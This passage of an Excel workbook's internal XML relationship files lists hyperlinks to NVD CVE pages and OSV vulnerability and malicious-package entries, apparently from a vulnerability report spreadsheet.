Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83613" TargetMode="External" Id="rId1622" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83614" TargetMode="External" Id="rId1623" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83615" TargetMode="External" Id="rId1624" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83616" TargetMode="External" Id="rId1625" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83617" TargetMode="External" Id="rId1626" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83618" TargetMode="External" Id="rId1627" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83619" TargetMode="External" Id="rId1628" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84303" TargetMode="External" Id="rId1629" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84363" TargetMode="External" Id="rId1630" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84364" TargetMode="External" Id="rId1631" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84365" TargetMode="External" Id="rId1632" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84367" TargetMode="External" Id="rId1633" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84368" TargetMode="External" Id="rId1634" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84369" TargetMode="External" Id="rId1635" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84370" TargetMode="External" Id="rId1636" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84373" TargetMode="External" Id="rId1637" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84375" TargetMode="External" Id="rId1638" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84376" TargetMode="External" Id="rId1639" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84378" TargetMode="External" Id="rId1640" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84379" TargetMode="External" Id="rId1641" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84380" TargetMode="External" Id="rId1642" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84381" TargetMode="External" Id="rId1643" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84382" TargetMode="External" Id="rId1644" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84445" TargetMode="External" Id="rId1645" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84452" TargetMode="External" Id="rId1646" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85061" TargetMode="External" Id="rId1647" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85062" TargetMode="External" Id="rId1648" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85063" TargetMode="External" Id="rId1649" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86477" TargetMode="External" Id="rId1650" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-26w7-cxv4-gfx2" TargetMode="External" Id="rId1651" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-2q42-4q24-7rgv" TargetMode="External" Id="rId1652" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-2x7j-588g-ccc2" TargetMode="External" Id="rId1653" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-2xp9-vwfh-vxw4" TargetMode="External" Id="rId1654" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16045" TargetMode="External" Id="rId1655" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16042" TargetMode="External" Id="rId1656" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-4qhr-qf46-fcrx" TargetMode="External" Id="rId1657" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-57v5-wqx3-cgj4" TargetMode="External" Id="rId1658" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-8m3c-c648-2xjj" TargetMode="External" Id="rId1659" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16047" TargetMode="External" Id="rId1660" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16046" TargetMode="External" Id="rId1661" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-cc9r-2j5m-2m83" TargetMode="External" Id="rId1662" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16043" TargetMode="External" Id="rId1663" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-j95f-988m-3j2f" TargetMode="External" Id="rId1664" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-mqvm-gmc4-6rv2" TargetMode="External" Id="rId1665" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-q72m-f2r4-w4cw" TargetMode="External" Id="rId1666" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-rgj7-g3m4-5g8c" TargetMode="External" Id="rId1667" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-v3f6-m9j2-437p" TargetMode="External" Id="rId1668" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-wmmp-3585-3rmp" TargetMode="External" Id="rId1669" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16048" TargetMode="External" Id="rId1670" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16049" TargetMode="External" Id="rId1671" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16050" TargetMode="External" Id="rId1672" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16051" TargetMode="External" Id="rId1673" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16052" TargetMode="External" Id="rId1674" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16056" TargetMode="External" Id="rId1675" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16057" TargetMode="External" Id="rId1676" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16058" TargetMode="External" Id="rId1677" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16199" TargetMode="External" Id="rId1678"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87491"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20079" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42016" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42018" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67277" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75650" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76460" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76461" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85706" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86060" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86218" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87886" TargetMode="External" Id="rId15" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet6.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81963" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85880" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58704" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87491" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-25249" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19490" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20079" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42016" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42018" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67277" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75650" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76460" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76461" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85706" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86060" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86218" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87886" TargetMode="External" Id="rId18" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet7.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81963" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85880" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-60004" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44756" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82004" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12645" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12646" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12647" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12650" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19232" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-26084" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48273" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78234" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86464" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12744" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12745" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28606" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49921" TargetMode="External" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58240" TargetMode="External" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58822" TargetMode="External" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61516" TargetMode="External" Id="rId22" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66302" TargetMode="External" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68839" TargetMode="External" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69276" TargetMode="External" Id="rId25" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69408" TargetMode="External" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69431" TargetMode="External" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69463" TargetMode="External" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69491" TargetMode="External" Id="rId29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69493" TargetMode="External" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69496" TargetMode="External" Id="rId31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69525" TargetMode="External" Id="rId32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69579" TargetMode="External" Id="rId33" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69586" TargetMode="External" Id="rId34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69590" TargetMode="External" Id="rId35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69595" TargetMode="External" Id="rId36" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69715" TargetMode="External" Id="rId37" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69730" TargetMode="External" Id="rId38" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69768" TargetMode="External" Id="rId39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69769" TargetMode="External" Id="rId40" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69819" TargetMode="External" Id="rId41" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69824" TargetMode="External" Id="rId42" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69829" TargetMode="External" Id="rId43" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69845" TargetMode="External" Id="rId44" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69910" TargetMode="External" Id="rId45" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70296" TargetMode="External" Id="rId46" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71374" TargetMode="External" Id="rId47" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71376" TargetMode="External" Id="rId48" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71377" TargetMode="External" Id="rId49" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72979" TargetMode="External" Id="rId50" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72982" TargetMode="External" Id="rId51" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72983" TargetMode="External" Id="rId52" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73009" TargetMode="External" Id="rId53" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73010" TargetMode="External" Id="rId54" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73025" TargetMode="External" Id="rId55" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77089" TargetMode="External" Id="rId56" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77092" TargetMode="External" Id="rId57" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77098" TargetMode="External" Id="rId58" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77493" TargetMode="External" Id="rId59" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78445" TargetMode="External" Id="rId60" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78509" TargetMode="External" Id="rId61" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78510" TargetMode="External" Id="rId62" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79569" TargetMode="External" Id="rId63" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79570" TargetMode="External" Id="rId64" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79574" TargetMode="External" Id="rId65" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79576" TargetMode="External" Id="rId66" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79577" TargetMode="External" Id="rId67" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65669" TargetMode="External" Id="rId68" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81376" TargetMode="External" Id="rId69" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76969" TargetMode="External" Id="rId70" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82533" TargetMode="External" Id="rId71" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62645" TargetMode="External" Id="rId72" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62647" TargetMode="External" Id="rId73" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69356" TargetMode="External" Id="rId74" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76200" TargetMode="External" Id="rId75" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76201" TargetMode="External" Id="rId76" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78997" TargetMode="External" Id="rId77" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67367" TargetMode="External" Id="rId78" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82067" TargetMode="External" Id="rId79" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84197" TargetMode="External" Id="rId80" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62646" TargetMode="External" Id="rId81" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69641" TargetMode="External" Id="rId82" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73309" TargetMode="External" Id="rId83" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73311" 